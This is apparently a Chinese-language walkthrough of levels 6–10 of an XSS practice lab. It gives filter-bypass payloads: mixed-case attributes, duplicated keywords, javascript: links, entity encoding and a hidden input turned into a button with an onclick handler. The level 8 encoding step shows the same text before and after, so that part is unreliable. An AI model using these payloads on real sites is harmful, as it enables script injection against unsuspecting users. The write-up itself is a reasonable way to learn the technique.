level6
仍旧输入:<script>alert(1)</script>
script被加了下划线
尝试on事件
也被加了下划线
尝试伪协议:"><a href=javascript:alert(1)>1</a>//
还是被加了下划线,那么就要尝试绕过方法了:
我所知的几种绕过方法:
如果是添加下划线则可尝试:
大小写绕过
实体编码绕过
如果是删除关键字则还可尝试:
重复关键字
这里先尝试大小写
构建:"><a HRef=javascript:alert(1)>1</a>//
点击蓝色的1后弹窗
过↘啦↗
当然也可以尝试实体编码
level7
照旧:<script>alert(1)</script>
检查源代码
这次是直接删除script,那么我们尝试重复关键字
构建:"><scrscriptipt>alert(1)</scrscriptipt>//
过↗啦↗!!!
level8
我们依旧输入:<script>alert(1)</script>
script被加了下划线,而且这里他有伪标签,所以我们可以利用一下
先尝试on事件:"oncilck=alert(1)//
发现不仅on被加了下滑先,而且双引号也被过滤了,那就该试试绕过,尝试实体编码了
实体编码网站:在线Html实体编码解码
构建:javascript:alert(1)
编码:javascript:alert(1)
过啦!!!
level9
输入:<script>alert(1)</script>
这里是有两个点的,第二个点应该是被加了某种检测机制,来判断是不是网站,还有就是这里script被加了下滑线
这里先不着急打开源码,先想想网站的一般构造,网址通常由https://或者http://开头,在<script>alert(1)</script>前分别放入这俩
果然成功添加了
这里script被禁用了我们试试on事件,构建http://"οnclick=alert(1)//
双引号被过滤了,而且on也被加了下滑线尝试大小写绕过
构建:http://"Onclick=alert(1)//
尝试实体编码绕过,这里实体编码http//:不能编码,后端代码会不认识:http://"Onclick=alert(1)//
这里构建应该是没有问题的,但是不知道为什么不行,所以尝试下:javascript:alert(1)"//http://
编码后:
这个也不行...
上网搜了一下:javascript:alert('http://www.baidu.com')
思路和我一样,但不知道为啥我这个不行
javascript:alert(1)"//http://,改成:javascript:alert('//http://'),就可以了
level10
页面中没有输入框,但是url中有传参,输入:<script>alert(1)</script>
检查源代码
第一个还是不行,而且也没有第二个点,但我们发现这里还有三个传参,分别尝试一下
构建:?t_link=123&t_history=456&t_sort=789
我们发现t_sort是可以用的,但他的类型是隐藏的,所以我们要改他的类型
构建?t_sort=1" type="button" οnclick=alert(1)//
过啦!!!
